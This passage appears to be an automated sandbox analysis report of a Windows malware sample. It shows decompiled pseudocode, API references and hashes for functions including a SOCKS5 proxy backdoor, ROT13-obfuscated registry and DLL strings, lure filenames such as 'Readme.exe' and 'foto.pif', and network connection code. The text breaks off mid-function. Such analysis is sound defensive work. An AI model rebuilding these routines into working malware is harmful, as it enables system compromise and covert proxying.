				signed int _v60;
				DWORD* _v64;
				signed int _t50;
				void* _t54;
				void* _t55;
				int _t58;
				DWORD* _t62;
				void* _t65;
				void* _t68;
				DWORD* _t73;
				signed int _t74;
				void* _t86;
				DWORD* _t88;
				void* _t89;
				void* _t90;
				void** _t92;
				void** _t93;
				void** _t94;

				_t74 = __edx;
				_v20 = 0;
				_t50 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0xa7, 0);
				_t90 = _t89 - 0x1c;
				_t86 = _t50;
				_t73 = 0;
				if((_t74 & 0xffffff00 | _t50 == 0xffffffff | _t50 & 0xffffff00 | _t50 == 0x00000000) == 0) {
					_v24 = GetFileSize(_t86, 0);
					_t54 = GetProcessHeap();
					_v52 = _v24;
					_v56 = 0;
					_t55 = RtlAllocateHeap(_t54);
					_t92 = _t90 - 0xfffffffffffffffc;
					_v28 = _t55;
					if(_t55 != 0) {
						_v52 = 0;
						_v56 =  &_v20;
						_v60 = _v24;
						_v64 = _v28;
						 *_t92 = _t86;
						_t58 = ReadFile(??, ??, ??, ??, ??);
						_t93 = _t92 - 0x14;
						if(_t58 != 0) {
							_t88 = 1 + ((0xb + _v24 * 4) * 0xaaaaaaab >> 0x20 >> 3) * 4;
							_v64 = _t88;
							 *_t93 = 0x40;
							_t62 = GlobalAlloc(??, ??);
							_t94 = _t93 - 8;
							_v56 = _t88;
							_v60 = _t62;
							_v64 = _v24;
							 *_t94 = _v28;
							 *_a8 = E00401996(_v28, _v24);
							_t65 = GetProcessHeap();
							_v60 = _v28;
							_v64 = 0;
							 *_t94 = _t65;
							HeapFree(??, ??, ??);
							 *(_t94 - 0xc) = _t86;
							CloseHandle(??);
							_t73 = _t62;
						} else {
							_t68 = GetProcessHeap();
							_v60 = _v28;
							_v64 = 0;
							 *_t93 = _t68;
							HeapFree(??, ??, ??);
							 *(_t93 - 0xc) = _t86;
							CloseHandle(??);
							_t73 = 0;
						}
					} else {
						 *_t92 = _t86;
						CloseHandle(??);
						_t73 = 0;
					}
				}
				return _t73;
			}

0x004017f8
0x00401801
0x0040183e
0x00401843
0x00401846
0x00401853
0x0040185a
0x00401873
0x00401876
0x0040187e
0x00401882
0x0040188d
0x00401892
0x00401895
0x0040189a
0x004018b1
0x004018bc
0x004018c3
0x004018ca
0x004018ce
0x004018d1
0x004018d6
0x004018db
0x00401924
0x0040192b
0x0040192f
0x00401936
0x0040193b
0x00401940
0x00401944
0x0040194b
0x00401952
0x0040195d
0x0040195f
0x00401967
0x0040196b
0x00401973
0x00401976
0x0040197e
0x00401981
0x00401989
0x004018dd
0x004018dd
0x004018e5
0x004018e9
0x004018f1
0x004018f4
0x004018fc
0x004018ff
0x00401907
0x00401907
0x0040189c
0x0040189c
0x0040189f
0x004018a7
0x004018a7
0x0040189a
0x00401994

APIs

CreateFileA.KERNEL32 ref: 0040183E
GetFileSize.KERNEL32 ref: 0040186B
GetProcessHeap.KERNEL32 ref: 00401876
RtlAllocateHeap.NTDLL ref: 0040188D
CloseHandle.KERNEL32 ref: 0040189F
ReadFile.KERNEL32 ref: 004018D1
GetProcessHeap.KERNEL32 ref: 004018DD
HeapFree.KERNEL32 ref: 004018F4
CloseHandle.KERNEL32 ref: 004018FF

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Heap$File$CloseHandleProcess$AllocateCreateFreeReadSize
String ID:
API String ID: 1447158257-0
Opcode ID: 3f111dcaf8cf3b0762ed0ef5d64caf3b4e836ab70030ef84dcd2666f8baf838a
Instruction ID: 56d12447d5e111c6f88c9cc84d084cd75ca963f9ae61866c417ed6db83e02629
Opcode Fuzzy Hash: 3f111dcaf8cf3b0762ed0ef5d64caf3b4e836ab70030ef84dcd2666f8baf838a
Instruction Fuzzy Hash: 614119B1904705DBD700EFA9C18536EBFF0AF84304F108A3EE884A7791D7799949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 10001C8C Relevance: 15.1, APIs: 10, Instructions: 81pipeCOMMON

Download Yara Rule

APIs

Socks5Accept.SHERVANS ref: 10001CAE

Part of subcall function 10001BBE: sread.SHERVANS ref: 10001BE6
Part of subcall function 10001BBE: sread.SHERVANS ref: 10001C20
Part of subcall function 10001BBE: swrite.SHERVANS ref: 10001C61
Part of subcall function 10001BBE: Socks5Auth.SHERVANS ref: 10001C76

Socks5GetCmd.SHERVANS ref: 10001CE0

Part of subcall function 100017DF: sread.SHERVANS ref: 10001806

Socks5CmdIsSupported.SHERVANS ref: 10001D0D

Part of subcall function 1000153E: Socks5SendCode.SHERVANS ref: 10001572

Socks5ServConnect.SHERVANS ref: 10001D36

Part of subcall function 10001451: socket.WS2_32 ref: 10001482
Part of subcall function 10001451: Socks5SendCode.SHERVANS ref: 100014B1

Socks5SendCode.SHERVANS ref: 10001D63

Part of subcall function 1000140F: swrite.SHERVANS ref: 1000144A

CreateConnectStruct.SHERVANS ref: 10001D79

Part of subcall function 100011DB: _malloc.SHERVANS ref: 100011F4

create_thread.SHERVANS ref: 10001D91

Part of subcall function 10001180: CreateThread.KERNEL32 ref: 100011B3

SocksPipe@4.SHERVANS ref: 10001D99

Part of subcall function 100012E4: swrite.SHERVANS ref: 10001337

closesocket.WS2_32 ref: 10001DB1
closesocket.WS2_32 ref: 10001DBC

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: Socks5$CodeSendsreadswrite$ConnectCreateclosesocket$AcceptAuthPipe@4ServSocksStructSupportedThread_malloccreate_threadsocket
String ID:
API String ID: 3751663279-0
Opcode ID: a2bd8abaf4e674468f1f84b6ef6117d609ec6930b513e553faca06ef849a4ba0
Instruction ID: 4b573f6a928498a40c2cc82285d3d9912bf6b4ab208de6b3f8843c6836bde082
Opcode Fuzzy Hash: a2bd8abaf4e674468f1f84b6ef6117d609ec6930b513e553faca06ef849a4ba0
Instruction Fuzzy Hash: 8531C8B88083189FD750DF65C4812DEBBF4EF48750F0189AEE99997305E7749A94CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00402BBA Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402BCE
lstrcat.KERNEL32 ref: 00402BE8

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402C20
lstrcat.KERNEL32 ref: 00402C42
lstrcat.KERNEL32 ref: 00402C67
lstrcat.KERNEL32 ref: 00402C91
lstrcat.KERNEL32 ref: 00402CB3
lstrcat.KERNEL32 ref: 00402CD8

Strings

mvcsvnd.qyy, xrefs: 00402CE0

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$CountTickrandsrand
String ID: mvcsvnd.qyy
API String ID: 2629717045-1605320677
Opcode ID: b637c6e49b961f897a22e2996b1a65de55874454525e38e3c73dff940bc89bf3
Instruction ID: 3c31970993b76fcb6f62e82551040ecc98f125b31847a965db22ab4f080a2362
Opcode Fuzzy Hash: b637c6e49b961f897a22e2996b1a65de55874454525e38e3c73dff940bc89bf3
Instruction Fuzzy Hash: F441FBB59043048BCB10BF65D98569DBBF0BF84314F40897FE584A7381EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE0 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 83sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

Part of subcall function 0040829C: CreateFileA.KERNEL32 ref: 004082DE
Part of subcall function 0040829C: CreateFileA.KERNEL32 ref: 00408336
Part of subcall function 0040829C: CloseHandle.KERNEL32 ref: 00408356

Part of subcall function 0040829C: GetFileSize.KERNEL32 ref: 00408409
Part of subcall function 0040829C: GetFileSize.KERNEL32 ref: 00408422
Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 00408436
Part of subcall function 0040829C: WriteFile.KERNEL32 ref: 00408480
Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 0040848E
Part of subcall function 0040829C: WriteFile.KERNEL32 ref: 004084BC
Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 004084CA
Part of subcall function 0040829C: SetFilePointer.KERNEL32 ref: 004084F0
Part of subcall function 0040829C: ReadFile.KERNEL32 ref: 00408529

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Sleep.KERNEL32 ref: 00403BC2

Strings

Readme.exe, xrefs: 00403B45
foto.pif, xrefs: 00403B96
Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba, xrefs: 00403BDD
mvcsv.qyy, xrefs: 00403B1B
fgngrz, xrefs: 00403BF3
mvcsvnd.qyy, xrefs: 00403B66
tepbcl.qyy, xrefs: 00403AEB
x, xrefs: 00403B80

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: File$lstrlen$CreateHandleSizeWritelstrcat$CloseConnectedDirectoryInternetLibraryLoadModulePointerReadSleepStateSystemmemset
String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba$Readme.exe$fgngrz$foto.pif$mvcsv.qyy$mvcsvnd.qyy$tepbcl.qyy$x
API String ID: 1266463258-727612787
Opcode ID: 4f08fd3119f6ef70fbf57858498a347b0345bdf901e6be3e447fbd951a2ad8b7
Instruction ID: aba1e27b33e5380b7e2637a9dd0f7b6f92beebfe16ff9740c24b48d29de174a4
Opcode Fuzzy Hash: 4f08fd3119f6ef70fbf57858498a347b0345bdf901e6be3e447fbd951a2ad8b7
Instruction Fuzzy Hash: 00313BB08097159AD310BF22C58529EBBE4AF80749F41CC7EF5C867281DB3C9689DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 100012E4 Relevance: 10.6, APIs: 7, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

swrite.SHERVANS ref: 10001337

Part of subcall function 10001236: send.WS2_32 ref: 1000125F

shutdown.WS2_32 ref: 10001395
shutdown.WS2_32 ref: 100013AB
closesocket.WS2_32 ref: 100013B9
closesocket.WS2_32 ref: 100013C7
Sleep.KERNEL32 ref: 100013E1
GlobalFree.KERNEL32 ref: 100013F9

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: closesocketshutdown$FreeGlobalSleepsendswrite
String ID:
API String ID: 1878692053-0
Opcode ID: e0839c0ce4ee56aa669c213a4fa6ec1e94d32b6c2ce99eb8bfe8c713ce6150e8
Instruction ID: 48072c1fa49bddfcfd526dd8cb4adb201c308eb4763bb1a22db86958bf961fa8
Opcode Fuzzy Hash: e0839c0ce4ee56aa669c213a4fa6ec1e94d32b6c2ce99eb8bfe8c713ce6150e8
Instruction Fuzzy Hash: 7E311CB0608240CBEB02EF79C5C579ABFE4EF01390F0585A8ED848F25AD775E945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE8 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 119memorystringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00405F28
GetProcessHeap.KERNEL32 ref: 00405F38

Part of subcall function 00409250: malloc.MSVCRT ref: 004092A3

Part of subcall function 004060AA: DnsQuery_A.DNSAPI ref: 004060E7
Part of subcall function 004060AA: GetProcessHeap.KERNEL32 ref: 0040610A
Part of subcall function 004060AA: RtlAllocateHeap.NTDLL ref: 00406122
Part of subcall function 004060AA: lstrcpy.KERNEL32 ref: 00406144
Part of subcall function 004060AA: GlobalFree.KERNEL32 ref: 00406182

GetProcessHeap.KERNEL32 ref: 00406049
HeapFree.KERNEL32 ref: 00406060

Part of subcall function 0040619A: memset.MSVCRT ref: 004061C4
Part of subcall function 0040619A: GetSystemTime.KERNEL32 ref: 00406249
Part of subcall function 0040619A: wsprintfA.USER32 ref: 004062BD
Part of subcall function 0040619A: socket.WS2_32 ref: 004062D9
Part of subcall function 0040619A: htons.WS2_32 ref: 004062F9
Part of subcall function 0040619A: inet_addr.WS2_32 ref: 0040630B
Part of subcall function 0040619A: gethostbyname.WS2_32 ref: 00406321
Part of subcall function 0040619A: connect.WS2_32 ref: 0040634D

Strings

@, xrefs: 00405F1A
j_@, xrefs: 00405FD2

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Heap$Process$Free$AllocateGlobalQuery_SystemTimeconnectgethostbynamehtonsinet_addrlstrcpymallocmemsetsocketstrchrwsprintf
String ID: @$j_@
API String ID: 3179556216-3208567232
Opcode ID: 9019b2dfd91c923306931ebe787b21ef8ab25a52cd19833d7762eabd49a2fa17
Instruction ID: 173fe34617f367652bf3f1e9fca4c53672752cc9009160b2f8c90af088e1383c
Opcode Fuzzy Hash: 9019b2dfd91c923306931ebe787b21ef8ab25a52cd19833d7762eabd49a2fa17
Instruction Fuzzy Hash: 7551B4B4904709DFCB10DFA5C48468EBBF1FF88314F14862AE868A7395D3389846CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9D0 Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0040AA3D
SetLastError.KERNEL32 ref: 0040AA4F

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ErrorLastValue
String ID:
API String ID: 1151882462-0
Opcode ID: 49d06252631d2c5c8c2d25fde44a13d536e716d3c70b2a77a029649fafb08e20
Instruction ID: 444a06ef6d56dde007bbc20e4d8b26003c34dd805877e33333d77d24524e80d9
Opcode Fuzzy Hash: 49d06252631d2c5c8c2d25fde44a13d536e716d3c70b2a77a029649fafb08e20
Instruction Fuzzy Hash: 88513A70E003088FDB10EFA9DA8469EBBF4BB04304F14853AD845B7390DB78A955CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB20 Relevance: 9.1, APIs: 6, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040BB20(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v40;
				intOrPtr _v52;
				long _v56;
				void* _v60;
				intOrPtr _v84;
				intOrPtr _v96;
				void* _t54;
				long _t56;
				void* _t57;
				void* _t58;
				void* _t60;
				void* _t62;
				long _t65;
				void* _t66;
				void* _t67;
				intOrPtr* _t70;
				void* _t72;
				void* _t78;
				void* _t82;
				void* _t88;
				void* _t94;
				intOrPtr _t101;
				long _t113;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t119;
				intOrPtr* _t120;
				long* _t121;
				void** _t122;
				long* _t123;
				intOrPtr* _t124;

				_t87 = __ebx;
				_push(__ebx);
				_t120 = _t119 - 0x1c;
				_t54 =  *0x418284;
				_t109 = _a4;
				if(_t54 == 0) {
					E0040B0E0(_t54);
					_t54 =  *0x418284;
					_t113 =  *(_t54 + 0x30);
					if(_t113 >= 0) {
						goto L2;
					} else {
						goto L15;
					}
					goto L47;
				} else {
					_t113 =  *(_t54 + 0x30);
					if(_t113 < 0) {
						L15:
						E0040B3B0(_t87, _t113);
						_t54 =  *0x418284;
						_t88 =  *(_t54 + 0x30);
						if(_t88 == 0) {
							goto L3;
						} else {
							goto L17;
						}
						L47:
					} else {
						L2:
						_t88 =  *(_t54 + 0x30);
						if(_t88 != 0) {
							L17:
							_t56 = GetLastError();
							 *_t120 =  *((intOrPtr*)(_t54 + 0x2c));
							_t113 = _t56;
							_t57 = TlsGetValue(??);
							_t121 = _t120 - 4;
							_t88 = _t57;
							 *_t121 = _t113;
							SetLastError(??);
							_t58 = _t88;
							_t120 = _t121 - 4;
						} else {
							L3:
							_t58 =  *(_t54 + 0x28);
						}
					}
				}
				_v20 = _t58;
				_v24 = _t58;
				if( *((intOrPtr*)(_t109 + 0xc)) != 0) {
					_t60 = E0040B8D0(_t109,  &_v24);
				} else {
					_t60 = E0040B6B0(_t109,  &_v24);
				}
				if(_t60 == 7) {
					_t78 =  *0x418284;
					_t88 = _v24;
					if(_t78 == 0) {
						E0040B0E0(_t78);
						_t78 =  *0x418284;
						if( *((intOrPtr*)(_t78 + 0x30)) >= 0) {
							L9:
							_t109 =  *((intOrPtr*)(_t78 + 0x30));
							if( *((intOrPtr*)(_t78 + 0x30)) != 0) {
								_v40 = _t88;
								 *_t120 =  *((intOrPtr*)(_t78 + 0x2c));
								if(TlsSetValue(??, ??) == 0) {
									GetLastError();
								}
							} else {
								 *(_t78 + 0x28) = _t88;
							}
							_t82 = _v24;
							_t116 =  *((intOrPtr*)(_t82 + 0x20));
							_t120 =  *((intOrPtr*)(_t82 + 0x28));
							goto __ecx;
						}
						L22:
						E0040B3B0(_t88, _t113);
						_t78 =  *0x418284;
						goto L9;
					}
					if( *((intOrPtr*)(_t78 + 0x30)) < 0) {
						goto L22;
					}
					goto L9;
				}
				abort();
				_push(_t116);
				_t117 = _t120;
				_t122 = _t120 - 0x28;
				_v52 = _t109;
				_t110 = _v40;
				_v60 = _t88;
				_v56 = _t113;
				_t114 =  *(_t110 + 0xc);
				if( *(_t110 + 0xc) == 0) {
					 *_t122 = _t110;
					return E0040B740();
				} else {
					_t62 =  *0x418284;
					if(_t62 == 0) {
						E0040B0E0(_t62);
						_t62 =  *0x418284;
					}
					_t91 =  *((intOrPtr*)(_t62 + 0x30));
					if( *((intOrPtr*)(_t62 + 0x30)) < 0) {
						E0040B3B0(_t91, _t114);
						_t62 =  *0x418284;
					}
					if( *((intOrPtr*)(_t62 + 0x30)) != 0) {
						_t65 = GetLastError();
						 *_t122 =  *(_t62 + 0x2c);
						_t114 = _t65;
						_t66 = TlsGetValue(??);
						_t123 = _t122 - 4;
						 *_t123 = _t65;
						SetLastError(??);
						_t67 = _t66;
						_t122 = _t123 - 4;
					} else {
						_t67 =  *(_t62 + 0x28);
					}
					_v24 = _t67;
					_v28 = _t67;
					if(E0040B8D0(_t110,  &_v28) == 7) {
						_t72 =  *0x418284;
						_t94 = _v28;
						if(_t72 == 0) {
							E0040B0E0(_t72);
							_t72 =  *0x418284;
						}
						if( *(_t72 + 0x30) < 0) {
							E0040B3B0(_t94, _t114);
							_t72 =  *0x418284;
						}
						_t110 =  *(_t72 + 0x30);
						if( *(_t72 + 0x30) != 0) {
							_v84 = _t94;
							 *_t122 =  *(_t72 + 0x2c);
							if(TlsSetValue(??, ??) == 0) {
								GetLastError();
							}
						} else {
							 *((intOrPtr*)(_t72 + 0x28)) = _t94;
						}
						_t62 = _v28;
						_t117 =  *((intOrPtr*)(_t62 + 0x20));
						_t122 =  *(_t62 + 0x28);
						goto __ecx;
					}
					abort();
					_push(_t117);
					_t124 = _t122 - 8;
					_t101 = _v84;
					_t70 =  *((intOrPtr*)(_t101 + 8));
					if(_t70 != 0) {
						_v96 = _t101;
						 *_t124 = 1;
						return  *_t70();
					} else {
						return _t70;
					}
				}
				goto L47;
			}

0x0040bb20
0x0040bb25
0x0040bb26
0x0040bb29
0x0040bb2e
0x0040bb33
0x0040bbb4
0x0040bbb9
0x0040bbbe
0x0040bbc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bb35
0x0040bb35
0x0040bb3a
0x0040bbd0
0x0040bbd0
0x0040bbd5
0x0040bbda
0x0040bbdf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bb40
0x0040bb40
0x0040bb40
0x0040bb45
0x0040bbf0
0x0040bbf3
0x0040bbf9
0x0040bbfc
0x0040bbfe
0x0040bc04
0x0040bc07
0x0040bc09
0x0040bc0c
0x0040bc12
0x0040bc14
0x0040bb4b
0x0040bb4b
0x0040bb4b
0x0040bb4b
0x0040bb45
0x0040bb3a
0x0040bb4e
0x0040bb54
0x0040bb59
0x0040bbad
0x0040bb5b
0x0040bb60
0x0040bb60
0x0040bb68
0x0040bb6e
0x0040bb73
0x0040bb78
0x0040bc46
0x0040bc4b
0x0040bc55
0x0040bb89
0x0040bb89
0x0040bb8e
0x0040bc23
0x0040bc27
0x0040bc35
0x0040bc3b
0x0040bc3b
0x0040bb94
0x0040bb94
0x0040bb94
0x0040bb97
0x0040bba0
0x0040bba3
0x0040bba6
0x0040bba6
0x0040bc60
0x0040bc60
0x0040bc65
0x00000000
0x0040bc65
0x0040bb83
0x00000000
0x00000000
0x00000000
0x0040bb83
0x0040bc6f
0x0040bc80
0x0040bc81
0x0040bc83
0x0040bc86
0x0040bc89
0x0040bc8c
0x0040bc8f
0x0040bc92
0x0040bc97
0x0040bd12
0x0040bd26
0x0040bc99
0x0040bc99
0x0040bca0
0x0040bd06
0x0040bd0b
0x0040bd0b
0x0040bca2
0x0040bca7
0x0040bd81
0x0040bd86
0x0040bd86
0x0040bcb2
0x0040bd2a
0x0040bd30
0x0040bd33
0x0040bd35
0x0040bd3b
0x0040bd40
0x0040bd43
0x0040bd49
0x0040bd4b
0x0040bcb4
0x0040bcb4
0x0040bcb4
0x0040bcb7
0x0040bcbd
0x0040bcca
0x0040bcd0
0x0040bcd5
0x0040bcda
0x0040bd72
0x0040bd77
0x0040bd77
0x0040bce5
0x0040bd90
0x0040bd95
0x0040bd95
0x0040bceb
0x0040bcf0
0x0040bd56
0x0040bd5a
0x0040bd68
0x0040bd6a
0x0040bd6a
0x0040bcf2
0x0040bcf2
0x0040bcf2
0x0040bcf5
0x0040bcfe
0x0040bd01
0x0040bd04
0x0040bd04
0x0040bd9f
0x0040bdb0
0x0040bdb3
0x0040bdb6
0x0040bdb9
0x0040bdbe
0x0040bdc2
0x0040bdc6
0x0040bdd0
0x0040bdc1
0x0040bdc1
0x0040bdc1
0x0040bdbe
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BBF3
TlsGetValue.KERNEL32(?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BBFE
SetLastError.KERNEL32(?,?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BC0C

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: fa13b5d1df785b275ee1be112967064b6d69b0b989222e142ff9d8512929a6cc
Instruction ID: 70379029d47ec5d74f210fe91046701c6fe62c7a006fd99b0e016d118132c0f1
Opcode Fuzzy Hash: fa13b5d1df785b275ee1be112967064b6d69b0b989222e142ff9d8512929a6cc
Instruction Fuzzy Hash: A1315B70A0061A8FCB50EF65CA84A5ABBB4FB44300B0585BED904AB796DB34FD05CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 10001A5B Relevance: 9.1, APIs: 6, Instructions: 89
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E10001A5B(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, short* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v284;
				signed int _v285;
				signed int _v286;
				void* _v308;
				signed int _v312;
				char _v316;
				short* _v320;
				void* _t45;
				signed int _t46;
				void* _t53;
				signed int _t55;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t70;
				signed int _t71;
				intOrPtr _t74;
				short* _t77;
				void* _t79;
				intOrPtr* _t80;

				_v16 = __ebx;
				_v12 = __esi;
				_v8 = __edi;
				_t74 = _a4;
				_t77 = _a8;
				_v286 = 0xff;
				_t46 = E1000128D(_t45, _t74, _t77, 2);
				_t71 = 0;
				if(_t46 != 0) {
					_t70 =  *(_t77 + 1) & 0x000000ff;
					_t71 = 0;
					if(((_t46 & 0xffffff00 |  *_t77 != 0x00000001 | 0 | _t70 == 0x00000000) & 0x00000001) == 0) {
						_t53 = E1000128D( &_v284, _t74,  &_v284, _t70 + 1);
						_t71 = 0;
						if(_t53 != 0) {
